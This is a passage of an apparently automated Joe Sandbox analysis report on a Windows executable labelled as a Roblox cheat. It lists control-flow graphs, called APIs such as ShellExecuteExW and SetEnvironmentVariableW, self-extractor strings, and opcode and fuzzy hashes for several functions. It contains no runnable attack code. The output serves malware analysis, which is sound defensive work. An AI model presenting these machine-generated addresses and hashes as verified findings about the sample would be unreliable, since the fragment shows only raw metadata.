7ff6e7e41b01-7ff6e7e41b08 1946->1950 1954 7ff6e7e41b5a-7ff6e7e41b81 call 7ff6e7e41868 RaiseException call 7ff6e7e41558 1949->1954 1955 7ff6e7e41b45-7ff6e7e41b58 1949->1955 1950->1938 1957 7ff6e7e41b0a-7ff6e7e41b0f 1950->1957 1952->1920 1954->1933 1955->1933 1955->1954 1957->1938 1960 7ff6e7e41b11-7ff6e7e41b19 1957->1960 1960->1933 1960->1938
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
                                                                                                                  • String ID: H
                                                                                                                  • API String ID: 3432403771-2852464175
                                                                                                                  • Opcode ID: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                                                                                  • Instruction ID: 1227332c195edeef6c4f79960b429de027d904658a2ca61ef20dcb7507e65e21
                                                                                                                  • Opcode Fuzzy Hash: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                                                                                  • Instruction Fuzzy Hash: 61915923A05B568AEF00CFA5E8407AC33A1BB08B98F444535DEAD57B54EF3DE446D345
                                                                                                                  Function 00007FF6E7E3F4E0 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 285COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1990 7ff6e7e3f4e0-7ff6e7e3f523 1991 7ff6e7e3f529-7ff6e7e3f565 call 7ff6e7e43cf0 1990->1991 1992 7ff6e7e3f894-7ff6e7e3f8b9 call 7ff6e7e11fa0 call 7ff6e7e42320 1990->1992 1998 7ff6e7e3f567 1991->1998 1999 7ff6e7e3f56a-7ff6e7e3f571 1991->1999 1998->1999 2001 7ff6e7e3f573-7ff6e7e3f577 1999->2001 2002 7ff6e7e3f582-7ff6e7e3f586 1999->2002 2003 7ff6e7e3f579 2001->2003 2004 7ff6e7e3f57c-7ff6e7e3f580 2001->2004 2005 7ff6e7e3f588 2002->2005 2006 7ff6e7e3f58b-7ff6e7e3f596 2002->2006 2003->2004 2004->2006 2005->2006 2007 7ff6e7e3f628 2006->2007 2008 7ff6e7e3f59c 2006->2008 2009 7ff6e7e3f62c-7ff6e7e3f62f 2007->2009 2010 7ff6e7e3f5a2-7ff6e7e3f5a9 2008->2010 2011 7ff6e7e3f637-7ff6e7e3f63a 2009->2011 2012 7ff6e7e3f631-7ff6e7e3f635 2009->2012 2013 7ff6e7e3f5ab 2010->2013 2014 7ff6e7e3f5ae-7ff6e7e3f5b3 2010->2014 2015 7ff6e7e3f660-7ff6e7e3f673 call 7ff6e7e263ac 2011->2015 2016 7ff6e7e3f63c-7ff6e7e3f643 2011->2016 2012->2011 2012->2015 2013->2014 2017 7ff6e7e3f5e5-7ff6e7e3f5f0 2014->2017 2018 7ff6e7e3f5b5 2014->2018 2033 7ff6e7e3f698-7ff6e7e3f6ed call 7ff6e7e4797c call 7ff6e7e1129c call 7ff6e7e232a8 call 7ff6e7e11fa0 2015->2033 2034 7ff6e7e3f675-7ff6e7e3f693 call 7ff6e7e313c4 2015->2034 2016->2015 2020 7ff6e7e3f645-7ff6e7e3f65c 2016->2020 2022 7ff6e7e3f5f5-7ff6e7e3f5fa 2017->2022 2023 7ff6e7e3f5f2 2017->2023 2019 7ff6e7e3f5ca-7ff6e7e3f5d0 2018->2019 2024 7ff6e7e3f5b7-7ff6e7e3f5be 2019->2024 2025 7ff6e7e3f5d2 2019->2025 2020->2015 2027 7ff6e7e3f8ba-7ff6e7e3f8c1 2022->2027 2028 7ff6e7e3f600-7ff6e7e3f607 2022->2028 2023->2022 2029 7ff6e7e3f5c0 2024->2029 2030 7ff6e7e3f5c3-7ff6e7e3f5c8 2024->2030 2025->2017 2031 7ff6e7e3f8c6-7ff6e7e3f8cb 2027->2031 2032 7ff6e7e3f8c3 2027->2032 2035 7ff6e7e3f609 2028->2035 2036 7ff6e7e3f60c-7ff6e7e3f612 2028->2036 2029->2030 2030->2019 2037 7ff6e7e3f5d4-7ff6e7e3f5db 2030->2037 2038 7ff6e7e3f8cd-7ff6e7e3f8d4 2031->2038 2039 7ff6e7e3f8de-7ff6e7e3f8e6 2031->2039 2032->2031 2057 7ff6e7e3f6ef-7ff6e7e3f73d call 7ff6e7e4797c call 7ff6e7e1129c call 7ff6e7e25b60 call 7ff6e7e11fa0 2033->2057 2058 7ff6e7e3f742-7ff6e7e3f74f ShellExecuteExW 2033->2058 2034->2033 2035->2036 2036->2027 2042 7ff6e7e3f618-7ff6e7e3f622 2036->2042 2043 7ff6e7e3f5dd 2037->2043 2044 7ff6e7e3f5e0 2037->2044 2045 7ff6e7e3f8d9 2038->2045 2046 7ff6e7e3f8d6 2038->2046 2047 7ff6e7e3f8e8 2039->2047 2048 7ff6e7e3f8eb-7ff6e7e3f8f6 2039->2048 2042->2007 2042->2010 2043->2044 2044->2017 2045->2039 2046->2045 2047->2048 2048->2009 2057->2058 2060 7ff6e7e3f846-7ff6e7e3f84e 2058->2060 2061 7ff6e7e3f755-7ff6e7e3f75f 2058->2061 2063 7ff6e7e3f850-7ff6e7e3f866 2060->2063 2064 7ff6e7e3f882-7ff6e7e3f88f 2060->2064 2065 7ff6e7e3f761-7ff6e7e3f764 2061->2065 2066 7ff6e7e3f76f-7ff6e7e3f772 2061->2066 2071 7ff6e7e3f868-7ff6e7e3f87b 2063->2071 2072 7ff6e7e3f87d call 7ff6e7e4220c 2063->2072 2064->1992 2065->2066 2067 7ff6e7e3f766-7ff6e7e3f76d 2065->2067 2068 7ff6e7e3f78e-7ff6e7e3f7ad call 7ff6e7e7e1b8 call 7ff6e7e3fe24 2066->2068 2069 7ff6e7e3f774-7ff6e7e3f77f call 7ff6e7e7e188 2066->2069 2067->2066 2073 7ff6e7e3f7e3-7ff6e7e3f7f0 CloseHandle 2067->2073 2068->2073 2098 7ff6e7e3f7af-7ff6e7e3f7b2 2068->2098 2069->2068 2088 7ff6e7e3f781-7ff6e7e3f78c ShowWindow 2069->2088 2071->2072 2077 7ff6e7e3f8fb-7ff6e7e3f903 call 7ff6e7e47904 2071->2077 2072->2064 2083 7ff6e7e3f805-7ff6e7e3f80c 2073->2083 2084 7ff6e7e3f7f2-7ff6e7e3f803 call 7ff6e7e313c4 2073->2084 2086 7ff6e7e3f82e-7ff6e7e3f830 2083->2086 2087 7ff6e7e3f80e-7ff6e7e3f811 2083->2087 2084->2083 2084->2086 2086->2060 2094 7ff6e7e3f832-7ff6e7e3f835 2086->2094 2087->2086 2093 7ff6e7e3f813-7ff6e7e3f828 2087->2093 2088->2068 2093->2086 2094->2060 2097 7ff6e7e3f837-7ff6e7e3f845 ShowWindow 2094->2097 2097->2060 2098->2073 2100 7ff6e7e3f7b4-7ff6e7e3f7c5 GetExitCodeProcess 2098->2100 2100->2073 2101 7ff6e7e3f7c7-7ff6e7e3f7dc 2100->2101 2101->2073
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID: .exe$.inf$Install$p
                                                                                                                  • API String ID: 1054546013-3607691742
                                                                                                                  • Opcode ID: 67b61dfe47284e38b67ea0c0b1901cc6ac0d6bddf6aab1d537367ec119b3a945
                                                                                                                  • Instruction ID: 8efb397c8b51ba7a8aad479d914469ceb8f7105649d8513ff46badd0649b81d2
                                                                                                                  • Opcode Fuzzy Hash: 67b61dfe47284e38b67ea0c0b1901cc6ac0d6bddf6aab1d537367ec119b3a945
                                                                                                                  • Instruction Fuzzy Hash: 79C1B123F18602A5FB08DB25E94837927B1AF89780F044031DAADD77B5DF3EE955834A
                                                                                                                  Function 00007FF6E7E3F0A4 Relevance: 16.6, APIs: 11, Instructions: 102COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ButtonChecked$Message$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4119318379-0
                                                                                                                  • Opcode ID: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
                                                                                                                  • Instruction ID: 920cf9744396817a96a101c59c5d572cf88b25a3645406e9dc1b960fa2d0f647
                                                                                                                  • Opcode Fuzzy Hash: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
                                                                                                                  • Instruction Fuzzy Hash: 8841E532B14A4296F700DF61E814BAA3360EB49F98F440135DDAE8BBD6CF7ED445874A
                                                                                                                  Function 00007FF6E7E1EF10 Relevance: 11.0, APIs: 7, Instructions: 453COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3668304517-0
                                                                                                                  • Opcode ID: 95f682f023754f56a0dcca5eb1f48e82665a17e2aa84d7a71d7c4cda38083178
                                                                                                                  • Instruction ID: 2444854339c97aac18a827001a92ad88284f1dc601444f112e70212e40ef1369
                                                                                                                  • Opcode Fuzzy Hash: 95f682f023754f56a0dcca5eb1f48e82665a17e2aa84d7a71d7c4cda38083178
                                                                                                                  • Instruction Fuzzy Hash: EF12C363F0974284EB10CB65D4453AD2371EB457A8F400232DEAD97ADADF3DD58AC389
                                                                                                                  Function 00007FF6E7E224C0 Relevance: 9.2, APIs: 6, Instructions: 164filetimeCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 3529 7ff6e7e224c0-7ff6e7e224fb 3530 7ff6e7e22506 3529->3530 3531 7ff6e7e224fd-7ff6e7e22504 3529->3531 3532 7ff6e7e22509-7ff6e7e22578 3530->3532 3531->3530 3531->3532 3533 7ff6e7e2257a 3532->3533 3534 7ff6e7e2257d-7ff6e7e225a8 CreateFileW 3532->3534 3533->3534 3535 7ff6e7e22688-7ff6e7e2268d 3534->3535 3536 7ff6e7e225ae-7ff6e7e225de GetLastError call 7ff6e7e26a0c 3534->3536 3538 7ff6e7e22693-7ff6e7e22697 3535->3538 3542 7ff6e7e2262c 3536->3542 3543 7ff6e7e225e0-7ff6e7e2262a CreateFileW GetLastError 3536->3543 3540 7ff6e7e22699-7ff6e7e2269c 3538->3540 3541 7ff6e7e226a5-7ff6e7e226a9 3538->3541 3540->3541 3544 7ff6e7e2269e 3540->3544 3545 7ff6e7e226ab-7ff6e7e226af 3541->3545 3546 7ff6e7e226cf-7ff6e7e226e3 3541->3546 3550 7ff6e7e22632-7ff6e7e2263a 3542->3550 3543->3550 3544->3541 3545->3546 3547 7ff6e7e226b1-7ff6e7e226c9 SetFileTime 3545->3547 3548 7ff6e7e2270c-7ff6e7e22735 call 7ff6e7e42320 3546->3548 3549 7ff6e7e226e5-7ff6e7e226f0 3546->3549 3547->3546 3551 7ff6e7e22708 3549->3551 3552 7ff6e7e226f2-7ff6e7e226fa 3549->3552 3553 7ff6e7e2263c-7ff6e7e22653 3550->3553 3554 7ff6e7e22673-7ff6e7e22686 3550->3554 3551->3548 3556 7ff6e7e226fc 3552->3556 3557 7ff6e7e226ff-7ff6e7e22703 call 7ff6e7e120b0 3552->3557 3558 7ff6e7e2266e call 7ff6e7e4220c 3553->3558 3559 7ff6e7e22655-7ff6e7e22668 3553->3559 3554->3538 3556->3557 3557->3551 3558->3554 3559->3558 3562 7ff6e7e22736-7ff6e7e2273b call 7ff6e7e47904 3559->3562
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3536497005-0
                                                                                                                  • Opcode ID: dc46ff84bd0c57c9ac2b9914d0228e8f14f7433d989622a2074281460ea8d587
                                                                                                                  • Instruction ID: 44925e44a04f66d82341c85566ae5aae0dd0df85a7511de610252ed2267b294e
                                                                                                                  • Opcode Fuzzy Hash: dc46ff84bd0c57c9ac2b9914d0228e8f14f7433d989622a2074281460ea8d587
                                                                                                                  • Instruction Fuzzy Hash: 2861D267A1868285EB208B29F40036E67A5BB847A8F101334DFFD47AD8DF3ED4598749
                                                                                                                  Function 00007FF6E7E3FD0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 3566 7ff6e7e3fd0c-7ff6e7e3fd37 3567 7ff6e7e3fd39 3566->3567 3568 7ff6e7e3fd3c-7ff6e7e3fd76 SetEnvironmentVariableW call 7ff6e7e2d0a0 3566->3568 3567->3568 3571 7ff6e7e3fd78 3568->3571 3572 7ff6e7e3fdc3-7ff6e7e3fdcb 3568->3572 3573 7ff6e7e3fd7c-7ff6e7e3fd84 3571->3573 3574 7ff6e7e3fdcd-7ff6e7e3fde3 3572->3574 3575 7ff6e7e3fdff-7ff6e7e3fe1a call 7ff6e7e42320 3572->3575 3579 7ff6e7e3fd89-7ff6e7e3fd94 call 7ff6e7e2d4c0 3573->3579 3580 7ff6e7e3fd86 3573->3580 3576 7ff6e7e3fdfa call 7ff6e7e4220c 3574->3576 3577 7ff6e7e3fde5-7ff6e7e3fdf8 3574->3577 3576->3575 3577->3576 3581 7ff6e7e3fe1b-7ff6e7e3fe23 call 7ff6e7e47904 3577->3581 3588 7ff6e7e3fd96-7ff6e7e3fda1 3579->3588 3589 7ff6e7e3fda3-7ff6e7e3fda8 3579->3589 3580->3579 3588->3573 3590 7ff6e7e3fdad-7ff6e7e3fdc2 SetEnvironmentVariableW 3589->3590 3591 7ff6e7e3fdaa 3589->3591 3590->3572 3591->3590
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID: sfxcmd$sfxpar
                                                                                                                  • API String ID: 3540648995-3493335439
                                                                                                                  • Opcode ID: 42a5c16ff962b42e9c466757ddc2add4312beed441a9accfeec164922430c806
                                                                                                                  • Instruction ID: fbb17821ceab1a91b84215fe0e96f74ddbc2ce67775dc79a82029aa242f5ecc4
                                                                                                                  • Opcode Fuzzy Hash: 42a5c16ff962b42e9c466757ddc2add4312beed441a9accfeec164922430c806
                                                                                                                  • Instruction Fuzzy Hash: 97315033A14A0694EB04DB65E4883AC2371EB48B98F540131DFAD977A9DF3DD042C349
                                                                                                                  Function 00007FF6E7E3B014 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54windowCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: GlobalResource$Object$AllocBitmapDeleteGdipLoadLock$CreateFindFreeFromSizeofUnlock
                                                                                                                  • String ID: ]
                                                                                                                  • API String ID: 2347093688-3352871620
                                                                                                                  • Opcode ID: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                                                                                                                  • Instruction ID: c19bf1d50c1ef8d96b260e70809a99da4475a10513d9d6a9fb4823e6cfa2326b
                                                                                                                  • Opcode Fuzzy Hash: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                                                                                                                  • Instruction Fuzzy Hash: 7D11BC22B0D24391FA649721D5497795391AF84BC8F080034D9FD8BBE6DF2EE9048B46
                                                                                                                  Function 00007FF6E7E3AE1C Relevance: 7.5, APIs: 5, Instructions: 27windowCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1266772231-0
                                                                                                                  • Opcode ID: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                                                                                  • Instruction ID: 462bb64998d99ce91831fc44e9f45d49c2b76829d63a94d0eef61602e66d061f
                                                                                                                  • Opcode Fuzzy Hash: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                                                                                  • Instruction Fuzzy Hash: 04F0EC27B3855392FB50DB21E896B362361BF90B05F805431E69EC28A5DF2ED548CB09
                                                                                                                  Function 00007FF6E7E391E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                  • String ID: EDIT
                                                                                                                  • API String ID: 4243998846-3080729518
                                                                                                                  • Opcode ID: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                                                                                  • Instruction ID: 53194d8c8f585f08149db47b3de4f97ae5ac3d18ff0bbe394df29a2ed07bc708
                                                                                                                  • Opcode Fuzzy Hash: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                                                                                  • Instruction Fuzzy Hash: 07018123B18A4791FA209B21F8157B663A0AF98748F440031CDAD8A6A5EF2EE149C745
                                                                                                                  Function 00007FF6E7E22CE0 Relevance: 6.1, APIs: 4, Instructions: 136fileCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 3921 7ff6e7e22ce0-7ff6e7e22d0a 3922 7ff6e7e22d0c-7ff6e7e22d0e 3921->3922 3923 7ff6e7e22d13-7ff6e7e22d1b 3921->3923 3924 7ff6e7e22ea9-7ff6e7e22ec4 call 7ff6e7e42320 3922->3924 3925 7ff6e7e22d2b 3923->3925 3926 7ff6e7e22d1d-7ff6e7e22d28 GetStdHandle 3923->3926 3928 7ff6e7e22d31-7ff6e7e22d3d 3925->3928 3926->3925 3930 7ff6e7e22d86-7ff6e7e22da2 WriteFile 3928->3930 3931 7ff6e7e22d3f-7ff6e7e22d44 3928->3931 3934 7ff6e7e22da6-7ff6e7e22da9 3930->3934 3932 7ff6e7e22d46-7ff6e7e22d7a WriteFile 3931->3932 3933 7ff6e7e22daf-7ff6e7e22db3 3931->3933 3932->3934 3935 7ff6e7e22d7c-7ff6e7e22d82 3932->3935 3936 7ff6e7e22ea2-7ff6e7e22ea6 3933->3936 3937 7ff6e7e22db9-7ff6e7e22dbd 3933->3937 3934->3933 3934->3936 3935->3932 3938 7ff6e7e22d84 3935->3938 3936->3924 3937->3936 3939 7ff6e7e22dc3-7ff6e7e22dd8 call 7ff6e7e1b4f8 3937->3939 3938->3934 3942 7ff6e7e22dda-7ff6e7e22de1 3939->3942 3943 7ff6e7e22e1e-7ff6e7e22e6d call 7ff6e7e4797c call 7ff6e7e1129c call 7ff6e7e1bca8 3939->3943 3942->3928 3944 7ff6e7e22de7-7ff6e7e22de9 3942->3944 3943->3936 3954 7ff6e7e22e6f-7ff6e7e22e86 3943->3954 3944->3928 3946 7ff6e7e22def-7ff6e7e22e19 3944->3946 3946->3928 3955 7ff6e7e22e88-7ff6e7e22e9b 3954->3955 3956 7ff6e7e22e9d call 7ff6e7e4220c 3954->3956 3955->3956 3957 7ff6e7e22ec5-7ff6e7e22ecb call 7ff6e7e47904 3955->3957 3956->3936
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
